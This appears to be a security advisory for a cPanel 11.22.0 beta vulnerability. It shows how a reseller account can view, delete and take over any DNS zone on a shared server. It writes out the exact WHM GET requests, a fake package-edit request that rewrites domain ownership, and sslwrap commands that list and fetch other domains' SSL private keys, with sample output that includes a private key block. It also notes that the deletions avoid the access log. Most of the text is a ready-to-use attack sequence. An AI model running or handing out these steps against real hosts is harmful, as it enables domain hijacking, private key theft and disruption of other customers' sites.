cPanel 11.22.0-BETA_23297 - delete any zone from /etc/named.conf and /var/named, recreate it under your account, obtain the SSL key for the domain



DESCRIPTION


Resellers could do a number of things with DNS, the most critical of which was removing any zone entry from /etc/named.conf and removing any zone from /var/named. As a result, the user could then recreate the zone under their account. In the examples below, $dnsuniqid could be any number from 1 to (infinity?) and did not already exist in /var/cpanel/dnsrequests.


Viewing any zone:

GET /scripts2/getzone_local?dnsuniqid=$dnsuniqid&zone=$victim_domain HTTP/1.1

Removing any zone:

GET /scripts2/removezone_local?dnsuniqid=$dnsuniqid&zone=$victim_domain HTTP/1.1

Adding the zone:

GET /scripts/adddns?ip=$a_record&zone=$victim_domain HTTP/1.1



After adding the zone, you needed to update /etc/userdomains to remove the previous entry for domain: victim. This was done by simply editing one of your local packages for your reseller account. Note that you did not actually need to edit a package, just send the request below, which makes WHM think you've edited the package and are now saving it.

GET /scripts2/addpkg?edit=yes&name=$package



Now you could edit the zone from within WHM. As an added bonus, you could use sslwrap to see if there was an SSL key installed for the domain.

[user@host ~]$ /usr/local/cpanel/bin/sslwrap LIST example.com key
example.com



If a key existed, you could view it.

[user@host ~]$ /usr/local/cpanel/bin/sslwrap FETCH example.com key
-----BEGIN RSA PRIVATE KEY-----
KxMP6EV+l33zYChNnn0CQElsRbFi1xrtASHgRPMJRyBTiorq//HtXXQICTeQWKd9
V6zPN6MMYDQHiboNpGTk/ZqE1O8GNR7GgUXVMhE1vqppvvaWiZLlXeG6AwIDAQAB
AoGAUNOOhz5l/hn6/b0aqJkh6sa1jQdqG3riVwexZc05Z9ERxre/KM8LMpg9eTK3
fPiEvw5HJi+Kp+M/yvoQVHJT67Z/JUqWD8Lh6Yep/VTmp5IHCEl+INrlqn4U7foE
kVEGwEjPAkEA0sN7WGy3rvvhSqJupz+CGe7vTu+8bLYLVpM0qBuAbS+FC6M6b5Rn
+AyAZc94HCDxC2oy2b91imsEO5dxe1DgdQaN21lNTE7BAJkCQQDpvF05ATgd/1YI
Goj+67ZFMewbeQMbfxPqu6Js0AHYnyEzhCTY9k3MLTeLTGRVnM7s4S5xdtWkvbka
1p51M2HRDs4UGPd/+mdBEQSKOII9HZRgjQJBAMWAHcF6T0HBrKAMVcddyPUF1mDD
QaNhCT05ZRKBgQDAbv+SAjmSR2DINd567MgiYOPYudelgIO0ilmlnDQ8/lmhi5A4
Or0VW1XmBIaynXbb3E8ESzBO2BwIPQnaeLLFX8lqfcNoFfujcZO7NDCjW1bACTe/
47r9FLnL4FcDorErwt4lA0TAmLL+XjA/khUCzUcjeZIJRLYguXGMmJBP9+xSl9SB
CzPwECd0UJbxMGYRjnFY7ZoVfOPz6LseLUsPh2wGygJYen77vlvRP4cV2S8CQAon
/tjQQz3VNIspqB1+rhHy3Ask3JSfZ2ThrLcw8ntFNu8=
-----END RSA PRIVATE KEY-----



Other nasty things could be done, such as constantly reloading BIND on the host.



IMPACT


Local users could remove all DNS zones on the server with blinding speed, and without this being logged to /usr/local/cpanel/logs/access_log (there was, however, information written to /usr/local/cpanel/logs/error_log). Local users could take control of any zone on the server. Local users could view the SSL keys that pertained to other domains on the server.